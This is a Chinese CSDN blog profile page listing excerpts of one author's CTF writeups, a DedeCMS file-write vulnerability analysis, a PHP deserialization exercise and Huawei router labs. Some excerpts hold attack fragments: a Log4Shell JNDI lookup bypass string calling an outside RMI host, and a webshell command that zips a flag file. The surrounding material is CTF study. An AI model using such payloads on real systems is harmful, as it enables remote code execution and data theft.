末 初
码龄2年
  • 795,612
    被访问
  • 481
    原创
  • 1,388
    排名
  • 1,960
    粉丝
关注
提问 私信
  • 毕业院校: 江西软件职业技术大学
  • 加入CSDN时间: 2020-02-07
博客简介:

末初 · mochu7

查看详细资料
  • 7
    领奖
    总分 3,279 当月 190
个人成就
  • 获得1,597次点赞
  • 内容获得653次评论
  • 获得2,691次收藏
创作历程
  • 17篇
    2022年
  • 105篇
    2021年
  • 371篇
    2020年
成就勋章
  • 入选《PHP领域内容榜》第8名
TA的专栏
  • 漏洞复现
    2篇
  • web渗透/前渗透
    12篇
  • 内网渗透/后渗透
    1篇
  • CTF技巧
    7篇
  • Java
    1篇
  • Python
    16篇
  • PHP
    5篇
  • Tools
    6篇
  • VulnHub
    4篇
  • Error/Build/Config/Install
    11篇
  • Windows
    3篇
  • CTF_WEB_Writeup
    160篇
  • CTF_MISC_Writeup
    246篇
  • 华为eNSP
    19篇
TA的推广
兴趣领域 设置
  • 安全
    系统安全web安全安全架构
  • 最近
  • 文章
  • 帖子
  • 关注/订阅/互动
搜TA的内容
搜索 取消

DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)

文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现漏洞原因uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell漏洞影响版本<= Dedecms V5.7 SP1的所有版本漏洞原理分析uploads/install/index.php对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理继续分析uploads/install/i
原创
发布博客 5 小时前 ·
30 阅读 ·
0 点赞 ·
0 评论

PHP反序列化构造POP链小练习

一个师傅给的源码,来源不知,就当作小练习记录一下<?phperror_reporting(0);class Vox{ protected $headset; public $sound; public function fun($pulse){ include($pulse); } public function __invoke(){ $this->fun($this->headset); }}.
原创
发布博客 2022.05.13 ·
191 阅读 ·
0 点赞 ·
0 评论

华为eNSP动态路由OSPF小实验三

R1syssys R1int lo 0ip add 1.1.1.1 32int g0/0/0ip add 12.1.1.1 24quitospf 1 router 1.1.1.1area 1network 12.1.1.0 0.0.0.255network 1.1.1.1 0.0.0.0R2syssys R2int g0/0/0ip add 12.1.1.2 24int s4/0/0ip add 23.1.1.2 24quitospf 1 router 2.2.2.
原创
发布博客 2022.05.05 ·
318 阅读 ·
0 点赞 ·
0 评论

华为eNSP动态路由OSPF小实验二

R1syssys R1int lo 0 ip add 1.1.1.1 32int g0/0/0ip add 12.1.1.1 24quitospf 1 router 1.1.1.1area 1network 1.1.1.1 0.0.0.0network 12.1.1.0 0.0.0.255R2syssys R2int g0/0/0ip add 12.1.1.2 24int g0/0/1ip add 23.1.1.2 24quitospf 1 router 2.2..
原创
发布博客 2022.05.04 ·
229 阅读 ·
0 点赞 ·
0 评论

华为eNSP动态路由OSPF小实验一

首先在每个路由器的设置上添加一个Serial的接口添加完之后即可开始配置R1:systemsys R1int g0/0/0ip add 12.1.1.1 24int s4/0/0ip add 13.1.1.1 24int lo 0ip add 1.1.1.1 32quitospf 1 router 1.1.1.1area 0network 12.1.1.0 0.0.0.255network 13.1.1.0 0.0.0.255network 1.1.1.1 0.0.0.0.
原创
发布博客 2022.04.28 ·
387 阅读 ·
1 点赞 ·
0 评论

第二届网刃杯网络安全大赛 Writeup

MISC玩坏的winxpvmdk文件,用DiskGenius打开,找到Administrator用户的桌面的学习资料binwalk分析meiren.png,foremost分离继续binwalk分析,foremost分离f1ag.png分离出来的压缩包需要密码提示QQ有压缩包密码,但是在虚拟磁盘镜像中没有找到有安装过QQ这个软件,猜测可能在线登录过,所以就找唯一安装的浏览器Firefox的本地数据这里几个.db文件都不是.db文件,Navicat无法建立连接,几个.sqlite文
原创
发布博客 2022.04.25 ·
3909 阅读 ·
11 点赞 ·
7 评论

2022DASCTF Apr X FATE 防疫挑战赛 Writeup

文章目录SimpleFlow熟悉的猫冰墩墩废物选手的misc做题记录SimpleFlow首先tcp.stream eq 50中分析传入的执行命令的变量是$s,也就是参数substr($_POST["g479cf6f058cf8"],2)找到对应的参数,然后去掉前面两位字符解码即可cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E]得到压缩包密码:PaSsZi
原创
发布博客 2022.04.25 ·
1253 阅读 ·
2 点赞 ·
2 评论

华为eNSP配置RIP综合实验

AR1配置:syssys AR1inter g0/0/0 ip add 172.16.4.2 24inter g0/0/1 ip add 172.16.1.1 24quitripversion 2network 172.16.0.0AR2配置:syssys AR2inter g0/0/0 ip add 172.16.4.3 24inter g0/0/1ip add 172.16.2.1 24quitripversion 2network 172.16.0.0.
原创
发布博客 2022.04.14 ·
943 阅读 ·
2 点赞 ·
0 评论

AntCTF x D^3CTF MISC部分Writeup

文章目录BadW3terWannaWaccaBadW3ter附件是wav,但是文件头有点问题,对比一下正常的wav即可发现前十六个字节被修改了第一行的内容猜测也是个有用的线索: CUY1nw31lai修改前十六个进制正常的wav文件头然后测试几个常见的wav文件隐写:SilentEye、Deepsound等稍微测试一下发现是DeepSound输入前面的到线索作为密码。得到flag.pngfile识别文件发现flag.png是TIFF文件PS可以选择打开TIFF文件首先有两
原创
发布博客 2022.03.08 ·
521 阅读 ·
8 点赞 ·
5 评论

BUUCTF:[安洵杯 2019]easy_serialize_php

https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php访问/index.php?f=highlight_file得到源码 <?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
原创
发布博客 2022.03.03 ·
445 阅读 ·
0 点赞 ·
0 评论

关于校园通使用过程中的相关脚本

关于校园通使用过程中的相关脚本
原创
发布博客 2022.02.24 ·
1555 阅读 ·
2 点赞 ·
0 评论

安装oh-my-zsh报错fatal: gnutls_handshake() failed: Error in the pull function的解决办法

安装oh-my-zsh时报错fatal: unable to access 'https://github.com/ohmyzsh/ohmyzsh.git/': gnutls_handshake() failed: Error in the pull function.Error: git clone of oh-my-zsh repo failed
原创
发布博客 2022.02.21 ·
275 阅读 ·
1 点赞 ·
0 评论

HGAME 2022 Writeup

文章目录Level - Week1WEBMISC欢迎欢迎!热烈欢迎!这个压缩包有点麻烦好康的流量群青(其实是幽灵东京)CRYPTO新人赛,就没有存题目附件了,简单的记录一下解题过程吧Level - Week1WEBMISC欢迎欢迎!热烈欢迎!hgame{We1com3_t0_HG@ME_2O22}这个压缩包有点麻烦README.txtI don't know if it's a good idea to write down all the passwords.将pa
原创
发布博客 2022.01.28 ·
3940 阅读 ·
9 点赞 ·
11 评论

【MISC】记一次自己以前出的一道题

今天突然翻到的很久以前给一位师傅学校出的校赛题目,想着直接删了太可惜了,就丢在博客这里把Havefun.zip压缩包有密码,弱口令123456直接解压出来happymisc.zip的密码根据提示是:fairytailPS:本人妖尾忠实粉丝^_^解压得到comment.txt很明显是base32,解码发现是zip文件的十六进制字节流的逆序直接用python处理一下转换成zip文件import structa = open("./coment.txt","r")#十六进制数据文件.
原创
发布博客 2022.01.28 ·
733 阅读 ·
2 点赞 ·
2 评论

2022 RealWorld CTF体验赛Writeup

文章目录Digital Souvenirlog4flagBe-a-Database-Hackerthe Secrets of Memorybaby flaglabFlag ConsoleBe-a-Database-Hacker 2Java Remote DebuggerDigital Souvenirrwctf{RealWorldIsAwesome}log4flag有一些正则过滤网上bypass方法很多,随便找一个就行${${::-j}ndi:${lower:rmi}://vw3nw
原创
发布博客 2022.01.23 ·
1164 阅读 ·
3 点赞 ·
0 评论

黑马程序员Java教程学习笔记(一)

文章目录黑马程序员Java学习笔记Java版本Java语言的跨平台原理JRE和JDKJDK的下载和安装HelloWorld案例注释关键字常量数据类型标识符类型转换运算符字符"+"操作字符串"+"操作复制运算符自增自减运算符关系运算符逻辑运算符三元运算符两只老虎三个和尚黑马程序员Java学习笔记Java版本Java(5.0):是更新力度很大的一个版本,直接让Java的发展进入了快车道Java(8.0):是公司中生产/开发环境使用的最多的版本Java(11.0):是Java学习者使用的最
原创
发布博客 2022.01.17 ·
8135 阅读 ·
2 点赞 ·
1 评论

长安“战疫”网络安全卫士守护赛Writeup

长安战疫Writeup
原创
发布博客 2022.01.08 ·
3296 阅读 ·
2 点赞 ·
1 评论

2021年第二届赣网杯网络安全大赛MISC-Writeup

文章目录decodemastergwb-misc-lovemathgwb-misc3-testcatdecodemasterdecodemaster.docx的内容是wingding编码:https://lingojam.com/WingDingSllv we GMT gje dsh vc sim gzwspio!EHRw tfk koa sq om reocxeua lzdpuil. W rkwa xsg tqiewtc pb wznjurz o vwspmnwzmvem jegbmnwz
原创
发布博客 2021.12.06 ·
4940 阅读 ·
8 点赞 ·
5 评论

第四届“安洵杯”网络安全挑战赛MISC-Writeup

文章目录WEBMISC应该算是签到CyzCC_loves_LOLCthulhu MythoslovemathWEBMISC应该算是签到B站搜索直接搜索这个BV号PS:出题人品味不错,我也喜欢酷玩的这首《Yellow》直接页面Ctrl+F没找出来搜索引擎找一下有没有通过API查弹幕的方法:https://www.bilibili.com/read/cv7923601F12点击Network,找到这个视频的cid从当前时间2021-11-27开始往前找https://api.bil
原创
发布博客 2021.11.29 ·
4553 阅读 ·
1 点赞 ·
0 评论

西湖论剑2021中国杭州网络安全技能大赛部分Writeup

文章目录MISC真签到YUSA的小秘密Yusa的秘密WEB灏妹的webMISC真签到DASCTF{welc0m3_t0_9C51s_2021}YUSA的小秘密使用Stegsolve打开调整通道可以发现藏有flag;但是被干扰倒是无法看清搜索引擎查阅资料发现题目这里指的是一种叫YCrCb颜色编码模型参考[ByteCTF2020]Hardcore Watermark 01:https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJY
原创
发布博客 2021.11.21 ·
8604 阅读 ·
12 点赞 ·
3 评论
加载更多